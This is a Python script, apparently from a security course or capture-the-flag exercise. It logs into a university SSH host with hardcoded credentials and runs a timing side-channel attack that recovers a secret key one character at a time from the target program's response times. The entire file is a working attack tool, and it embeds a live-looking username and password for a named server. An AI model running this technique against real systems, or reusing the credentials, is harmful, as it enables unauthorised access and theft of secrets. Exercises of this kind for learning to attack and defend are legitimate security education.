import string
import random
import operator
import sys
import traceback
import paramiko
import itertools
import statistics
import pickle
import base64
import re
from collections import defaultdict
from scipy import stats
from shlex import quote

NSAMPLES = 4
DEBUG = False

key = paramiko.ECDSAKey(data=base64.b64decode("AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6BMhE8iR+OoCjLDQ9GPJjHY3yfk/tC5VBUC4mLdJ3EbaUlNjfAyE5cbW6dxH3AVNSXTTOaRDSsVI82Lv0brtg="))
client = paramiko.SSHClient()
client.get_host_keys().add('agile019.science.uva.nl', 'ecdsa-sha2-nistp256', key)
client.connect('agile019.science.uva.nl', username='hackme3', password='tryMeMore')

def try_option(chars):
    shell_quoted = quote(chars)
    stdin, stdout, stderr = client.exec_command('./main '+shell_quoted)
    res = [*stdout]
    if len(res) == 0:
        print("Warning: no result from command?")
        return
    if DEBUG:
        print(res[0].strip())
    return res[0].strip()

def median_try_option(chars, samples=None):
    results = []
    for i in range(samples or NSAMPLES):
        output = try_option(chars)
        while '-' in output and 'seconds' in output:
            # print(f"Skipping output {output}, negative number of seconds.")
            output = try_option(chars)
        results.append(output)

    try:
        times = tuple(float(re.search(r'(-?\d+.\d+)', result).group(1)) for result in results)
        median_time = statistics.median(times)
    except:
        print(f"Found key? results: {results}")
        print(f"Chars: {chars!r}")
        sys.exit(1)
    return (times, median_time)

def robust_try_option(chars):
    output = "-seconds"
    while '-' in output and 'seconds' in output:
        output = try_option(chars)
    return float(re.search(r'(-?\d+.\d+)', output).group(1))

def try_possibilities(base, possibilities, samples=None):
    time_map = defaultdict(list)

    samples = samples or NSAMPLES
    means = {}

    for sample in range(samples):
        for n, possibility in enumerate(possibilities):
            time = robust_try_option((base + possibility).ljust(16))
            time_map[possibility].append(time)

            means = {}
            for k, vs in time_map.items():
                means[k] = statistics.median(vs)
            sorted_means = sorted(means.items(), key=operator.itemgetter(1), reverse=True)

            best_two = ""
            for k, v in sorted_means[:2]:
                best_two += f"[{k}: {v}] "

            print(f"[{sample*len(possibilities) + n}/{samples*len(possibilities)}] Time for key {base+possibility!r}: {time} {best_two}")

    return time_map, means

def find_next_n(base, n, char_range=None, nsamples=None):
    char_range = char_range or map(chr, range(0x20, 0x7f))
    possibilities = [''.join(x) for x in itertools.product(char_range, repeat=n)]

    tm1, means = try_possibilities(base, possibilities, samples=nsamples)

    with open(f'data_base_{base}.pickle', 'wb') as f:
        pickle.dump(tm1, f)

    return max(means.items(), key=operator.itemgetter(1))[0]

def find_key(base):
    while True:
        base += find_next_n(base, 1, nsamples=5, char_range=string.ascii_lowercase)
        print(f"Base: {base!r}")

find_key('flagtimingsis')
client.close()
